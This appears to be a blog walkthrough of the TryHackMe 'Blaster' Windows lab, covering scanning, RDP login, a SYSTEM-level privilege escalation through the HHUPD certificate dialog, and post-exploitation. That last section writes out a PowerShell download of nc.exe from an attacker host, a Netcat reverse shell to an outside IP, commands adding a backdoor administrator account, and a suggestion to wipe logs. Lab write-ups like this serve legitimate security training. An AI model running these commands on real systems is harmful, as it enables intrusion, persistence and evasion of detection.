TryHackMe "Blaster" Windows Challenge Without Metasploit - Privesc Edition

Blaster is one of the more fun machines I've done lately from TryHackMe.  DarkStar has built a machine that has one of the coolest exploits I've seen in a while, and it makes you scratch your head wondering how the person who discovered it actually discovered it.  The steps in the room were modified to include an exploitation path I suggested via the Metasploit web_delivery module, however this guide will use a separate method that doesn't include using Metasploit.  Blaster is a FREE room, and you can get checked in over at https://tryhackme.com/room/blaster. Once you've done that, we can get started.

Scanning

Conducting our quick Nmap scan of the machine (remember to use the -Pn flag here as it doesn't respond to pings) shows that only a couple of ports are open.

nmap -Pn 10.10.205.59

So we have a web server and remote desktop running.  Let's get some more information using the -A scan.

nmap -A -Pn 10.10.205.59 -p80,3389

So as we can see, there isn't a whole lot going on.  If we are following the guide, you can answer question #1 at this point.  Port 80 returns some information about the underlying web server, which we can use to glean the answer to #2. 

Enumeration

When we head to the address, however, we notice that all we get is a default IIS web server page, which isn't exactly what we expected.  However, we can run Gobuster to see if we can locate any subdirectories.  This turns out to be successful.

./gobuster dir -u 10.10.205.59 -w /root/Desktop/directories/directory-list-lowercase-2.3-small.txt -t 100

We are able to locate the /retro directory, which we can use to answer #3.  We can then check out that page on the website, which we find is a page to "Retro Fanatics" (which is actually a really cool page for this project - great job!).  Right away we are met what could be the answer to #4.  Enter it and see if it works.  

 Retro Fanatics webpage

If we read through the page we can catch some blasts from the past about video games, as well as a clue about a possible password to use with the name we found. 

Possible Clue for User Password

 If we use our Google Fu, we can determine the name of the person he has a connection to.  This could be the possible password.  Enter it into Question #5 and see.  

Character Name

Exploitation

As you see, this character was the correct answer.  We can now use the username and password we have discovered to login to the machine using Remote Desktop.  I used xfreerdp in this instance, however you can use whichever method you prefer.

xfreerdp /u:redacted /p:redacted /v:10.10.205.59

 Successfully Logged In

Now that we are logged in we can see the user.txt flag on the Desktop.  Open that and grab the answer to #6.

user.txt flag on Desktop

 We can now move on to Task 3 in the room, which first suggests that we should check out the machine to see if we can find any information about what they were doing.  If we poke around in the browser's history we can grab the answer to #1.  

User's browser history

Additionally, we could see before that there was something in the recycling bin.  Let's check that out.

Recycling Bin contents

We can drag the contents to the Desktop to use them, as well as answer question #2.  Researching the combination of the CVE we found in the history and HHUPD, we can determine that there is a really interesting exploit we can use to elevate our privileges to administrator.  It will be easier to follow along via pictures.  Where you see a red box, you should click that link with your mouse and follow the next image.  Start by double clicking HHUPD to run it.

Click Show more details

 Click Show information about the publisher's certificate

Click VeriSign Commercial Software Publishers CA

What is going on here is that there is a vulnerability in the software where it runs using system privileges.  When you are clicking these links, it is as if the system authority is functioning.  Clicking the Certificate link above, it is actually the system authority opening the browser here.  Click ok and exit out of everything, and you will see a Internet Explorer open up. You want to press "Alt" to get the program menu bar to pop up, and click Save as...

Clicking save as

Clicking save as will show you an error message that says the location is not available.  This is expected, and you can ignore it by pressing ok.

Expected error message

 This is the moment my mind was absolutely blown.  If you enter cmd.exe in the address bar of the save as window, you are able to pull a command prompt, which is actually running as the system authority.

Enter cmd.exe in the address bar

whoami nt authority\system

 If you would like, you can navigate to C:\Users\Administrator\Desktop directory and grab the root.txt flag.  

root.txt flag on the Administrator's Desktop

At this point in the challenge you should be on Task 4, where you will be asked to use the Metasploit module "web_delivery."  By setting the target to 2 (set target 2), as well as using the windows/meterpreter/reverse_tcp payload, you are able to grab a reverse shell by copying the output from the exploit into your elevated command prompt and running it.  As this is a no-Metasploit version of the Room, this is where I will leave you to successfully gain control of the machine.

If your goal was to grab flags and complete the challenge, congratulations!  You're there.  However, as post-exploitation is something typically ignored in CTF events, I am including these in my guides from now on.  If you are not interested, thanks for stopping in, I hope my guide has been helpful, and I'll see you next time!  If you are interested, please continue reading on.

Post Exploitation

Post exploitation persistence and control of this machine is pretty straight forward.  The machine itself is running Windows Defender which won't allow us to upload any payloads to the machine outright.  However, what we can do is add users if we choose, as well as transfer a Netcat binary to the machine to allow us localized control.  

Left - powershell -c wget "http://10.11.1.198:8080/nc.exe" -outfile "nc.exe" Right - python -m SimpleHTTPServer 8080

 Right - nc -nlvp 4444 ; Left - nc.exe 10.11.1.198 4444 -e cmd.exe

Let's get a new user created, and add them to the Administrator's group, giving us full control of the machine, bypassing the lack of a password for the Administrator, and allowing us to RDP in with our own account.

net user themayor passredacted /add ; net localgroup "Administrators" themayor /add ; net users to confirm

Now that we have ensured persistence on the machine, we can use our new account to log in ourselves.  I used xfreerdp, but you can use whatever you would like.

Desktop access via xfreerdp and Server Manager control

We now have complete control of the machine and the server manager environment.  We can quickly confirm this by going to Tools -> Computer Management and clicking on Local Users and Groups.  We will see that we are in the Administrators group.  This would be game over for a real world engagement, and we would need to review our rules of engagement to consider our next steps and most likely contact our client to inform them of the critical nature of the exploit.

Our user in the Administrator's group

If we were in a Red Team type engagement, and somehow have not been identified yet by the security team, we could change the Administrator's password, log back in with that account, and conduct cleanup operations in the logs to erase our tracks.  I encourage you to take this path on your own and see how much you can learn by manipulating these privileges and logs. 

Final Thoughts

Overall Blaster is an incredibly great machine with an awesome path to system authority.  Privilege escalation came naturally with the exploit this time around, however our post-exploitation tasks are up to us.  I hope this guide has helped you out with Blaster and given you a better understanding of post exploitation, and I will see you again soon!